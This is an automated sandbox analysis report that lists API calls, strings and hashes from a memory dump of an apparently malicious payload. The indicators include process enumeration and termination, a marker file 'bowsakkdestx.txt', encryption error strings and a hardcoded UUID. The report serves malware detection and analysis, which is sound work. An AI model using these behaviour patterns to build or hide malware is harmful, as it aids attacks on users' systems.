                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: 3d2d84c760bdbbc84d76742b5b86cede216c5f514f54607fd500a9036b74f7c9
                                                                                                        • Instruction ID: d8c199f8f07a0d4d562dbb2dd891f95ac73872b36d059c619b417476b02636b1
                                                                                                        • Opcode Fuzzy Hash: 3d2d84c760bdbbc84d76742b5b86cede216c5f514f54607fd500a9036b74f7c9
                                                                                                        • Instruction Fuzzy Hash: 470192369012197BE721ABE1AD8AFAE776CDB48B54F040051FD08D2142E6648940AAE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 00F0F338
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F0F353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                        • Opcode ID: 26ad6378daf37ec2ae9fa65c29c302721bd1c7dd4632db1669a51a16b53d8a6e
                                                                                                        • Instruction ID: 5bfda25f19f615e696dd519c6acc2edcf3cde9a5d182d5ba2bd4239be15161c5
                                                                                                        • Opcode Fuzzy Hash: 26ad6378daf37ec2ae9fa65c29c302721bd1c7dd4632db1669a51a16b53d8a6e
                                                                                                        • Instruction Fuzzy Hash: 50C16D71D01209EBDF10DFA4DD86BDEBBB5BF14308F144029E405B7190EB7AAA58EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        • Opcode ID: 24a1bcd992400dd68933eb05d30f4d7fb5bc73ff2780b8d016e484546c74e24a
                                                                                                        • Instruction ID: 3e4a3df81ca3ea9521d5393ad408b089c8bf3a2ba48a5dda5a5d6cc31924b773
                                                                                                        • Opcode Fuzzy Hash: 24a1bcd992400dd68933eb05d30f4d7fb5bc73ff2780b8d016e484546c74e24a
                                                                                                        • Instruction Fuzzy Hash: E8A183B1C00249DBEF11EFA4DC46BDEBB75AF10314F144128E50577292E7BA5688EBE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        • Opcode ID: 8cb7feb1a470375b60a0285218d6b91cd90e1f97b866cba460d2779a00f88a54
                                                                                                        • Instruction ID: 08f95d8e7b7842382a9ae32dc9bb1e2b7161d1bc368ae7b082ac91dc5f82734e
                                                                                                        • Opcode Fuzzy Hash: 8cb7feb1a470375b60a0285218d6b91cd90e1f97b866cba460d2779a00f88a54
                                                                                                        • Instruction Fuzzy Hash: E2414F65FC839129F731A52ABC03F96B7855B51B31F080425FB88E91C3FB95C947B192
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F25141
                                                                                                          • Part of subcall function 00F27D6C: EncodePointer.KERNEL32(00000000,?,00F25146,00F23FFE,01007990,00000014), ref: 00F27D6F
                                                                                                          • Part of subcall function 00F27D6C: __initp_misc_winsig.LIBCMT ref: 00F27D8A
                                                                                                          • Part of subcall function 00F27D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F326B3
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F326C7
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F326DA
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F326ED
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F32700
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F32713
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F32726
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F32739
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F3274C
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F3275F
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F32772
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F32785
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F32798
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F327AB
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F327BE
                                                                                                          • Part of subcall function 00F27D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F327D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F25146
                                                                                                        • __mtterm.LIBCMT ref: 00F2514F
                                                                                                          • Part of subcall function 00F251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F25154,00F23FFE,01007990,00000014), ref: 00F28B62
                                                                                                          • Part of subcall function 00F251B7: _free.LIBCMT ref: 00F28B69
                                                                                                          • Part of subcall function 00F251B7: DeleteCriticalSection.KERNEL32(0100AC00,?,?,00F25154,00F23FFE,01007990,00000014), ref: 00F28B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F25174
                                                                                                        • __initptd.LIBCMT ref: 00F25196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F2519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: 6dcbade93e4d1aa63e4c339fc4a9b10d26f71f11ae3c1d1eb86c0de1724c66b5
                                                                                                        • Instruction ID: 3b6379e674f8e81896de5c6da88ab48701dcb51a6ecc2366f65221da9794ac39
                                                                                                        • Opcode Fuzzy Hash: 6dcbade93e4d1aa63e4c339fc4a9b10d26f71f11ae3c1d1eb86c0de1724c66b5
                                                                                                        • Instruction Fuzzy Hash: 78F0243294AB711EF27577B47C03B8A36C09F00B30F21061AF0A4CA1C6FF3884027290
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F2594A
                                                                                                          • Part of subcall function 00F28AF7: __mtinitlocknum.LIBCMT ref: 00F28B09
                                                                                                          • Part of subcall function 00F28AF7: __amsg_exit.LIBCMT ref: 00F28B15
                                                                                                          • Part of subcall function 00F28AF7: EnterCriticalSection.KERNEL32(00000000,?,00F27E21,00000008,01007B08,0000001C,00F27CFB,?,00000001,00000000,?,00F27C49,000000FF,?,00F2501A,00000010), ref: 00F28B22
                                                                                                        • _free.LIBCMT ref: 00F25970
                                                                                                          • Part of subcall function 00F20BED: HeapFree.KERNEL32(00000000,00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000), ref: 00F20C01
                                                                                                          • Part of subcall function 00F20BED: GetLastError.KERNEL32(00000000,?,00F2507F,00000000,00F2500D,?,00F23F7C,?,00F1E6CC,00000000,?,?,?,?,?,00FCB3EC), ref: 00F20C13
                                                                                                        • __lock.LIBCMT ref: 00F25989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F25998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F259B1
                                                                                                        • _free.LIBCMT ref: 00F259C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F507C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F41726
                                                                                                        • _strlen.LIBCMT ref: 00F41734
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • _strnlen.LIBCMT ref: 00F417BF
                                                                                                        • __lock.LIBCMT ref: 00F417D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F417DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F3B70B
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _free.LIBCMT ref: 00F3B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020059152-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F1F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F1F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F1E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F1E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F1FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F1FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 847d90be9bd26a0726ea4e920b3f736d746d6baaec05237da63874b85aef67b9
                                                                                                        • Instruction ID: 4ade58a82910a3c872de98f192cb00e32583a683d21c13ddd5d49cae533878fa
                                                                                                        • Opcode Fuzzy Hash: 847d90be9bd26a0726ea4e920b3f736d746d6baaec05237da63874b85aef67b9
                                                                                                        • Instruction Fuzzy Hash: 1F018631F40309BBEB209B55DD4BFA63B6CAB44B10F544061FA04AF1D1D7E9A84596E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: 70d3359d99fa96a512ebf6065fde110672db5d23778765169c7e7cfa4a438d14
                                                                                                        • Instruction ID: b44096e9bc589134e14ed398f1a4ab8afe82c5adb5dada556369674b02363ca3
                                                                                                        • Opcode Fuzzy Hash: 70d3359d99fa96a512ebf6065fde110672db5d23778765169c7e7cfa4a438d14
                                                                                                        • Instruction Fuzzy Hash: 2E819DB1A087508FD710DF28A84062BBBE5BFC8755F19091DFE99A7212E334DD099B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 2ee222681d7ac6d67c8ed62abee521d6ebdc97a014c8a47985168345d3bb7e8e
                                                                                                        • Instruction ID: 42a654bbe93e1b83090eca86f6cb1450fe1340ebf2e1056ca69595e684b9beac
                                                                                                        • Opcode Fuzzy Hash: 2ee222681d7ac6d67c8ed62abee521d6ebdc97a014c8a47985168345d3bb7e8e
                                                                                                        • Instruction Fuzzy Hash: A351B5727083049BDB28EE1CDC80AAA77B6EF84710B24891DF859CB345DB31DD91ABD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 6eb4b2edde54fab078c8cd951bf44d17bff2f8d53dc169821bd0673907f3035a
                                                                                                        • Instruction ID: d64465a59ecea3d1f2a270dcf6706e76a4ab18978299ae7af06f607f1385a091
                                                                                                        • Opcode Fuzzy Hash: 6eb4b2edde54fab078c8cd951bf44d17bff2f8d53dc169821bd0673907f3035a
                                                                                                        • Instruction Fuzzy Hash: 6B31F471700244ABDB28DE5CDC819AA77B6EFC07207604A1CF865DB285D731FDC1ABA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F0C5DA
                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00F0C5F6
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F0C640
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F0C687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: a609f9481376859d38ab73078bb92a8b4590b0cd084d35bcc4180e4695539c22
                                                                                                        • Instruction ID: ecf93805c208018c312e6d72e898bc4680a7db2effe5516ce7b63f7fb34254dd
                                                                                                        • Opcode Fuzzy Hash: a609f9481376859d38ab73078bb92a8b4590b0cd084d35bcc4180e4695539c22
                                                                                                        • Instruction Fuzzy Hash: A7210772608345ABD7209F24DC05B9BBBE8AF81754F004A2EF48983291D776D548A7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F0C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C4A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 7096c8be0a0cdce8e75a5cf1f08fc3bdc2f1a55dba9982f476ddaf6e618bb822
                                                                                                        • Instruction ID: dc4430833b1e543478b94c8dc8ee61ae3f8728283ae0056b3f69e810ebf52354
                                                                                                        • Opcode Fuzzy Hash: 7096c8be0a0cdce8e75a5cf1f08fc3bdc2f1a55dba9982f476ddaf6e618bb822
                                                                                                        • Instruction Fuzzy Hash: 3401D672A8022C33DA30A6A4BC87FFF775C9F51721F0001A6FE08D7181E6A9998676D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F1BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F1BA73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$>
                                                                                                        • API String ID: 1693014935-1374489303
                                                                                                        • Opcode ID: 141e1cee009ffb48c7ec4e7f3f2488faa7bd4b4cf4c71f1e583b8a01b49b4646
                                                                                                        • Instruction ID: f54a1634d9bb86654836fb96bcba2682caad2d9698462fdce6d039f246e1f5a4
                                                                                                        • Opcode Fuzzy Hash: 141e1cee009ffb48c7ec4e7f3f2488faa7bd4b4cf4c71f1e583b8a01b49b4646
                                                                                                        • Instruction Fuzzy Hash: 5BF0B2B0C0430C9BEB01DFD1DA197DEBBB4BB08308F104249D8187A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F0C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F0C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: c672e4bb364386221ee352b4e72c5a1d9e2904cd2797f2411e7fcf23f3538d8f
                                                                                                        • Instruction ID: d163d0b5fc2043239eadba521c654649874cff1ba0cc9fbad1fe3304b6e0065e
                                                                                                        • Opcode Fuzzy Hash: c672e4bb364386221ee352b4e72c5a1d9e2904cd2797f2411e7fcf23f3538d8f
                                                                                                        • Instruction Fuzzy Hash: C7E08675A4031C67EB20EBA0ED8BFD9776CAB04B01F000091FB4CD30D1D6B0E5896AD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F3C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F3C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00F3C0ED,?,00BFBBEF,00000003), ref: 00F3C709
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00F3C0ED,?,00BFBBEF,00000003), ref: 00F3C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 32bd9f9a2578f62a54fe7b69ccd9c1e6f35965716903ede268bbd32bb73cb62f
                                                                                                        • Instruction ID: 958b5bbfb07505c705c1ff8c81d069e0a7f1e1915e0c4ba36c67e8636c04e2d3
                                                                                                        • Opcode Fuzzy Hash: 32bd9f9a2578f62a54fe7b69ccd9c1e6f35965716903ede268bbd32bb73cb62f
                                                                                                        • Instruction Fuzzy Hash: 5031CF31A00256EFDB218F75CC45BAA7BA9FF41330F158529E859AB1A0E731E850FBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00F0F125
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00F0F198
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000), ref: 00F0F1A1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F0F1A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1421093161-0
                                                                                                        • Opcode ID: c47af9d522c1d7818cf2269e154cf990ee6563a00041bd12d37f21e6d0fcd596
                                                                                                        • Instruction ID: 3e1483357ca61b249abb4bffc4b0610983d75c1eaded08b646a64a40dd7ad05b
                                                                                                        • Opcode Fuzzy Hash: c47af9d522c1d7818cf2269e154cf990ee6563a00041bd12d37f21e6d0fcd596
                                                                                                        • Instruction Fuzzy Hash: A5312632D00209EBDB149F68DC4ABEE7B78EF05714F508128F805A75C0D7756A49EBE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FC70AB
                                                                                                          • Part of subcall function 00FC77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FC77D2
                                                                                                          • Part of subcall function 00FC77A0: ___AdjustPointer.LIBCMT ref: 00FC77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FC70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FC70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FC70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
